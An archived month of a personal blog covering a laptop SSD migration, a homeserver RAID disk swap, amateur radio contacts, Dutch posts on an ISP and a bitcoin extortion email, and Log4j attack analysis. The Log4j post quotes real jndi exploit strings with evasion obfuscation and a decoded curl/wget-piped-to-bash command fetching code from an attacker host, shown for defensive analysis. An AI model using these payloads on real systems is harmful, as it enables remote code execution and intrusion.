News archive December 2021 - Koos van den Hout

Archive by year: 1999 | 2000 | 2001 | 2002 | 2003 | 2004 | 2005 | 2006 | 2007 | 2008 | 2009 | 2010 | 2011 | 2012 | 2013 | 2014 | 2015 | 2016 | 2017 | 2018 | 2019 | 2020 | 2021 | 2022

2021-12-28 I tried to upgrade my laptop to an SSD.. and failed
After fixing the server hardware I had some time due to the Christmas holidays to look at my laptop, a Dell. It's getting a bit aged (originally from January 2016) and especially the disk is getting slow. Due to the upgrade of SSD storage in the homeserver I still have two 240 gigabyte solid state drives. So I tried to migrate the laptop to one of those solid state drives. Which was interesting in a number of ways: there are two operating systems to migrate: Linux and Windows 10 and the harddisk is 500 gigabyte, so 240 gigabyte would need an amount of cleanup before all could be moved.

I thought the harddisk was 320 gigabyte, so the downgrade from 500 to 240 gigabyte was worse than I expected.

I did some reading on migrating Windows 10 to an SSD and found out I needed a cloning tool. Navigating between subscriptions and expensive versions I found Macrium Reflect which according to How to Copy Your Windows Installation to an SSD - PCMag should be able to do this.

I have an external USB to IDE/SATA interface which is great for this kind of work. So the SSD started in that slot.

First windows didn't want to delete the EFI partition from the GPT partition table. Since the original disk has an msdos partition table and the laptop doesn't have UEFI firmware I booted linux and created partitions as I wanted them with the right type.

After that I created the Linux swapspace and filesystem and copied all Linux data to the filesystem.

After that the Macrium Reflect tool would not copy Windows 10 partitions to existing partitions so I had to delete the two Windows 10 partitions. I have no idea why, but this laptop has a Dell partition, a windows partition named RECOVERY and a windows partition named OS. Deleting the two windows partitions on the target disk also made the linux swap and root filesystem disappear without any questions whether that was a good idea.

After that it was several hours to copy the windows filesystems. After that was done I used the windows disk and partition manager to resize the big partition to leave space for the linux installation.

I booted Linux again, created the swap partitions and root filesystem again and copied the data again. At least rsync with the right options is faster than Macrium Reflect.

After that I tried to install grub on the new disk with the right options and did the first test boot of the new disk. Open laptop underside, take out disk carrier, swap disk, put the disk carrier back in and close the laptop again.

No dice: grub stopped really early. I did more searching and found I needed to use grub-install /dev/sdb --skip-fs-probe --boot-directory=/mnt/newinstall/boot so time to remove the new drive again, revert to the old, rerun grub with those options, remove old drive, insert new drive and try again. This time the menu showed that I wanted but I got an error about accessing the disk by uuid.

After that I also tried windows on the SSD but that gave an error it needed the Windows recovery boot.

So again back to the old disk and looking at options for creating a recovery boot USB stick. The 'Create recovery disk' program was busy with disk i/o for about 15 minutes and reported the USB stick for recovery has to be at least 16 Gigabytes which I didn't have available.

At this point I gave up. This process took most of the afternoon and it started to feel frustrating.

Tags: , ,
2021-12-27 Raid-1 on the homeserver rebuilt
After seeing read errors on one disk in the raid-1 of the homeserver I ordered a replacement SSD of a different brand and exactly the same size. It arrived today, and I did the work to replace the suspect disk.

First set the old disk as failed and removed from the array. And note the complete serial number on a piece of paper to make sure I removed the faulty disk.

After that the server was shut down, disconnected from a lot of cables, dragged from the homerack in the attic and I worked on it. It took a while to open the side with the SSDs (below the mainboard) and with two exactly the same SSDs it was a 50% chance which one to remove. After removing the disk tray and unscrewing the SSD from the disk tray I was able to read the physical label on the underside and I guessed right.

After that the new disk was installed, the case closed again and dragged back to its place and cables connected again. After boot it came all up fine.

After bootup I partitioned the new disk, added it to the raid-1 again and set up the EFI and Linux boot partitions on the disk.

Last step was to setup the boot menu with efibootmgr to set both disks as bootable.

Tags: , ,
2021-12-21 New ssd for the homeserver ordered
I noticed syslog messages I don't like:
[17200683.290921] md: data-check of RAID array md127
[17200683.291277] md: minimum _guaranteed_  speed: 1000 KB/sec/disk.
[17200683.291619] md: using maximum available idle IO bandwidth (but not more than 200000 KB/sec) for data-check.
[17200683.291935] md: using 128k window, over a total of 937253184k.
[17201245.784689] ata2.00: exception Emask 0x0 SAct 0x1fe00000 SErr 0x0 action 0x0
[17201245.785175] ata2.00: irq_stat 0x40000008
[17201245.785465] ata2.00: failed command: READ FPDMA QUEUED
[17201245.785766] ata2.00: cmd 60/80:a8:00:52:51/00:00:0c:00:00/40 tag 21 ncq dma 65536 in
                           res 41/40:20:60:52:51/00:00:0c:00:00/00 Emask 0x409 (media error) <F>
[17201245.786402] ata2.00: status: { DRDY ERR }
[17201245.786737] ata2.00: error: { UNC }
[17201245.787281] ata2.00: configured for UDMA/133
[17201245.787619] sd 1:0:0:0: [sdb] tag#21 FAILED Result: hostbyte=DID_OK driverbyte=DRIVER_SENSE
[17201245.787966] sd 1:0:0:0: [sdb] tag#21 Sense Key : Medium Error [current] 
[17201245.788317] sd 1:0:0:0: [sdb] tag#21 Add. Sense: Unrecovered read error - auto reallocate failed
[17201245.788689] sd 1:0:0:0: [sdb] tag#21 CDB: Read(10) 28 00 0c 51 52 00 00 00 80 00
[17201245.789123] blk_update_request: I/O error, dev sdb, sector 206656096
[17201245.789530] ata2: EH complete
And a number of other errors on sdb. Time to replace it! I ordered a new ssd. This time a different brand. Current configuration is with 2 Kingston drives with very close serial numbers, so maybe the other drive will give similar issues soon.

The check of the raid1 mirror was also showing differences. I'm waiting for the replacement ssd to show up, and at that moment I will remove the suspect ssd from the array and replace it.

Update 2021-12-24: Writing about the order helped speed things up: I just received notification the replacement ssd is being sent. Which will not show up until after Christmas. I also noticed the problematic Kingston still has warranty, so maybe I can get a replacement for that one too. They came in about 1.5 years ago when I upgraded the storage on the homeserver.

Tags: , ,
2021-12-20 De laatste bij xs4all kan het licht uit doen
Op 24 december stopt de mogelijkheid om een abonnement bij xs4all af te nemen volgens XS4ALL definitief weg, actiecomite heft zichzelf op, nieuwe provider freedom.nl blijft - xs4allmoetblijven.nl en na de jaarwisseling zal voortvarend de omzetting van xs4all aansluitingen naar het KPN netwerk gebeuren.

Zoals in het artikel aangehaald zijn links en rechts meerdere onderdelen die achteruit gaan in dienstverlening. Zowel op technisch vlak als op het gebied van opties in dienstverlening. Maar KPN blijft net doen alsof er 'niets' veranderd met hooguit wat uitzonderingen. Bij goed kijken gaat het meer om een hele waslijst van dingen die xs4all juist bijzonder maakten.

Ik ben op 4 augustus 2021 overgestapt naar freedom en dat werkt prima. Het zou mooi zijn als er ooit glasvezel aangelegd zou worden waarop ik voor freedom als provider kan kiezen, maar tot die tijd is er met de xDSL techniek redelijk te leven.

Tags: , ,
2021-12-19 New entity in amateur radio: Mount Athos
Today I added a special 'country' in my list of countries I have had contacts with. I had a contact with Mount Athos which is an autonomous area in Greece with special rules. The wikipedia entries on Mount Athos and Monastic Republic of Mount Athos have all the details so I won't repeat them here.

The story goes that Mount Athos has no phone lines and therefore it seemed a good idea to give the monks that live at one of the monasteries on Mount Athos access to amateur radio so they can contact the outside world in an emergency.

As autonomous area with some rules different from Greek law it is seen as a separate entity for ARRL DXCC so 'everybody' chases for a contact with Mount Athos.

The monks do make it somewhat easy to get the contact, the radio station was running in FT8 fox/hound mode today. The next bit is getting it confirmed, and they really like a donation to the monasteries to get the confirmation.

Tags: , ,
2021-12-14 Finding out what one (java) attack tries to do
I checked the logs for some more actual attacks and found one to analyze.

Digging out the java class and decompiling it made it clear what it does in a windows environment: enumerate the number of computers seen in active directory in the last 100 days. And post the result to the server it came from. In Russia.

Tags: ,
2021-12-13 Logs full of jndi: scans
A large part of last weekend was filled with the log4j vulnerability at work. Now I have some more time to look at the effect this has had on my home server I'm seeing a patter of lots of 'friendly' scanners with a few actual attack attempts in between.

Some special ones from the logs:

Trying all the fields (URL, referrer and user-agent), probably a 'friendly' scanner:
45.83.66.84 - - [13/Dec/2021:04:53:21 +0100] "GET /$%7Bjndi:dns://45.83.64.1/securityscan-https443%7D HTTP/1.1" 404 969 "${jndi:dns://45.83.64.1/securityscan-https443}" "${jndi:dns://45.83.64.1/securityscan-https443}"
Trying to circumvent web application firewalls that have been set up with simple rules against the log4j vulnerability. I'm not sure whether this is a 'friendly' scanner or an actual attempt at abuse.
138.197.216.230 - - [13/Dec/2021:11:39:59 +0100] "GET / HTTP/1.1" 200 2211 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}"
Trying to load a "Legitimate" java class.
167.172.44.255 - - [13/Dec/2021:17:26:02 +0100] "GET / HTTP/1.0" 503 652 borchuk/3.1 ${jndi:ldap://167.172.44.255:389/LegitimateJavaClass} - -> /
But related to an IPv4 address that is becoming famous, I find this gem:
45.155.205.233 - - [12/Dec/2021:06:38:34 +0100] "GET /?x=${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC80NS44My4yMzIuMTM0OjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC80NS44My4yMzIuMTM0OjQ0Myl8YmFzaA==} HTTP/1.1" 200 2211 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC80NS44My4yMzIuMTM0OjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC80NS44My4yMzIuMTM0OjQ0Myl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC80NS44My4yMzIuMTM0OjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC80NS44My4yMzIuMTM0OjQ0Myl8YmFzaA==}"
And decoding the obvious base64 gives:
echo -e KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC80NS44My4yMzIuMTM0OjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC80NS44My4yMzIuMTM0OjQ0Myl8YmFzaA== | base64 -d ; echo
(curl -s 45.155.205.233:5874/45.83.232.134:443||wget -q -O- 45.155.205.233:5874/45.83.232.134:443)|bash
But I haven't been able to fetch anything from 45.155.205.233:5874 yet and I'm getting really curious what it is/was. The other IP address is the external address of the server, so I guess it's a way to make curl/wget not return an error code.

Tags: , ,
2021-12-13 New countries in amateur radio: Dominican Republic and Belize
Again amateur radio is good for learning geography: two new countries in the log where I really had to look up where they are!

This time in the Carribean: the Domican Republic and Belize right after another. In FT8 mode, on the 20 meter band. Usually the Americas are hard for me which is logical with my home antenna. The house is between the antenna and the north-east direction.

The Dominican Republic is already digitally confirmed. I'm waiting for confirmation of the contact with Belize. I also checked some other unconfirmed countries and send out a kind e-mail in the hopes of getting another country confirmed. The chase continues ;)

Tags: , ,
2021-12-01 Fraudepoging "Je hebt nog een betaalopdracht uitstaan"
Met zo'n onderwerpregel voor een e-mail bericht weet ik al zeker dat het een fraude poging is, maar het bleek dit keer een van de beruchte bitcoin afpersingspogingen te zijn. De tekst is weer behoorlijk goed nederlands:
Hallo! Helaas heb ik slecht nieuws voor je. Enkele maanden geleden heb ik toegang gekregen tot de apparaten waarmee je op het internet surft. Vervolgens heb ik je internetactiviteiten nagetrokken. Hieronder volgt een overzicht van de gebeurtenissen die hiertoe hebben geleid: Eerst heb ik van hackers toegang gekocht tot talrijke e-mail accounts (tegenwoordig is dat een heel simpele klus die gewoon online kan worden gedaan). Zonder enige moeite heb ik vervolgens kunnen inloggen op jouw e-mail account (xxxx @ yyyyyyy). Een week later heb ik het voor elkaar gekregen een Trojaans virus te installeren op besturingssystemen van al je apparaten die voor e-mail toegang gebruikt worden. Eigenlijk was dat heel eenvoudig (want je klikte op de links in je inbox emails).
En zo nog een heleboel tekst verder, maar het belangrijke deel:
Schrijf 1750€ naar mijn rekening (bitcoin equivalent op basis van de wisselkoers tijdens je overschrijving) over
Hieronder staat mijn Bitcoin wallet: 1HvuQda3pzxyCnTJVpb1TpADMF2s3GB6g6 Je krijgt precies 48 uur de tijd nadat je deze e-mail geopend hebt (2 dagen om precies te zijn).
Bitcoin wallet 1HvuQda3pzxyCnTJVpb1TpADMF2s3GB6g6 was al bekend bij bitcoinabuse en heeft zo te zien helaas al een bedrag ontvangen van bijna 4 keer 1750 euro.

Trap hier niet in, het is echt complete onzin wat er beweerd wordt en alleen maar een manier om geld afhandig te maken. Lees ook: Ik word per mail gechanteerd - Fraudehelpdesk.nl
Read the rest of Fraudepoging "Je hebt nog een betaalopdracht uitstaan"

Tags: , ,

IPv6 check

Running test...
, reachable as koos+website@idefix.net. PGP encrypted e-mail preferred. PGP key 5BA9 368B E6F3 34E4 local copy PGP key 5BA9 368B E6F3 34E4 via keyservers

RSS
Meningen zijn die van mezelf, wat ik schrijf is beschermd door auteursrecht. Sommige publicaties bevatten een expliciete vermelding dat ze ongevraagd gedeeld mogen worden.
My opinions are my own, what I write is protected by copyrights. Some publications contain an explicit license statement which allows sharing without asking permission.
Other webprojects: Camp Wireless, wireless Internet access at campsites, The Virtual Bookcase, book reviews
This page generated by $Id: morenews.cgi,v 1.53 2022/02/15 21:48:18 koos Exp $ in 0.033342 seconds.